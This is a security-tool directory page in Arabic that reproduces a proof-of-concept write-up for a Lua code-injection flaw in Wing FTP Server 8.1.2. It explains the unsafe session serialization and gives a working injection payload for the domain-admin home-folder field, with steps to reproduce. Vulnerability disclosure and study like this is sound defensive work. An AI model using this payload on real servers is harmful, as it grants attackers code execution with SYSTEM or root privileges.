Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-44403-WingFTP-v8.1.2-POC-Exploit — CVE-2026-44403-WingFTP-v8.1.2-POC-Exploit | Kitploit
أدوات/GitHubGitHub/zemarkhos/cve-2026-44403-wingftp-v8.1.2-poc-exploit
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHub
zemarkhos/cve-2026-44403-wingftp-v8.1.2-poc-exploit

CVE-2026-44403-WingFTP-v8.1.2-POC-Exploit

CVE-2026-44403-WingFTP-v8.1.2-POC-Exploit

عرض المستودع
13منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

يحتوي Wing FTP Server الإصدار 8.1.2 على ثغرة تنفيذ كود عن بُعد (RCE) في آلية تسلسل الجلسة. يمكن لمسؤول مصادق عليه حقن كود Lua تعسفي عبر حقل mydirectory (المجلد الأساسي) لمسؤول النطاق، ويُنفَّذ هذا الكود من جانب الخادم عبر loadfile().

هذه ثغرة منفصلة عن CVE-2025-47812. عالج الإصلاح المطبق في الإصدار 7.4.4 لـ CVE-2025-47812 ناقل حقن البايت الفارغ في حقل اسم المستخدم فقط. أما آلية تسلسل الجلسة غير الآمنة الكامنة فلم يتم إصلاحها، ولا تزال قابلة للاستغلال عبر حقل المجلد الأساسي للمسؤول في الإصدار 8.1.2.

دالة تسلسل الجلسة serialize() في SessionModule.lua (السطر 103) وSessionModuleAdmin.lua (السطر 104) تكتب قيم السلاسل باستخدام ترميز السلسلة الطويلة [[...]] في Lua:

root@kitploit:~
outf("_SESSION["..k.."]=[["..v.."]]\r\n")

إذا احتوت قيمة جلسة على ]]، تُغلق السلسلة الطويلة قبل الأوان ويُفسَّر المحتوى المتبقي ككود Lua قابل للتنفيذ.

يوجد كود لتعقيم الأقواس في cgi.lua (الأسطر 274-275) وcgiadmin.lua (الأسطر 277-278)، لكنه معلّق:

root@kitploit:~
--v = string.gsub(v,"%[","")
--v = string.gsub(v,"%]","")

كما أن الجدول الفوقي للجلسة (metatable) الذي كان سيفرض هذا التعقيم معطّل أيضًا:

root@kitploit:~
--setmetatable(_SESSION,session_metatable)   -- cgi.lua:282, cgiadmin.lua:285

الاستغلال

الخطوة 1 — حقن الحمولة عبر المجلد الأساسي لمسؤول النطاق:

يقوم مسؤول كامل الصلاحيات ومصادق عليه بإنشاء أو تعديل حساب مسؤول نطاق. يتم تعيين حقل mydirectory على:

root@kitploit:~
C:\ftproot]]os.execute("whoami > C:\\proof.txt")--

لا تقوم نقطتا النهاية service_add_admin.html وservice_modify_admin.html بتعقيم أحرف الأقواس من حقل mydirectory. (تزيل service_add_admin.html الأقواس من اسم المستخدم في السطرين 14-15، لكنها لا تزيلها من mydirectory.)

الخطوة 2 — تحفيز التنفيذ:

عندما يسجّل مسؤول النطاق المُسمَّم الدخول عبر service_login.html، يُخزَّن المجلد الأساسي مباشرةً في الجلسة:

root@kitploit:~
rawset(_SESSION,"admin_basefolder",basefolder)   -- service_login.html:95
rawset(_SESSION,"admin_nowpath",basefolder)       -- service_login.html:96

يكتب SessionModuleAdmin.save() ذلك إلى ملف الجلسة بالشكل التالي:

root@kitploit:~
_SESSION['admin_basefolder']=[[C:\ftproot]]os.execute("whoami > C:\\proof.txt")--]]

الخطوة 3 — تنفيذ الكود:

عند طلب HTTP التالي الذي يستخدم تلك الجلسة، يستدعي SessionModuleAdmin.load() الدالة loadfile() متبوعةً بـ f() (الأسطر 184-188). يفسّر محلل Lua ملف الجلسة كما يلي:

root@kitploit:~
_SESSION['admin_basefolder']=[[C:\ftproot]]     --> assigns string "C:\ftproot"
os.execute("whoami > C:\\proof.txt")            --> EXECUTES AS CODE
--]]                                            --> rest is commented out

تُنفَّذ الحمولة بصلاحيات عملية Wing FTP Server (SYSTEM على ويندوز، root على لينكس).

إثبات المفهوم

تم تطوير استغلال PoC عملي واختباره ضد Wing FTP Server الإصدار 8.1.2 على ويندوز.

خطوات إعادة الإنتاج:

  1. سجّل الدخول إلى لوحة الإدارة

  2. أنشئ مسؤول نطاق جديد بالقيمة التالية لحقل mydirectory:

    root@kitploit:~
    C:\ftproot]]os.execute("whoami > C:\\wingftp_rce_proof.txt")--
    
  3. سجّل الدخول باسم مسؤول النطاق المُنشأ حديثًا

  4. انتقل إلى أي صفحة إدارة (يؤدي ذلك إلى تحميل الجلسة)

  5. تحقق من إنشاء C:\wingftp_rce_proof.txt بحيث يحتوي على اسم مستخدم الخادم

تنزيل الأداة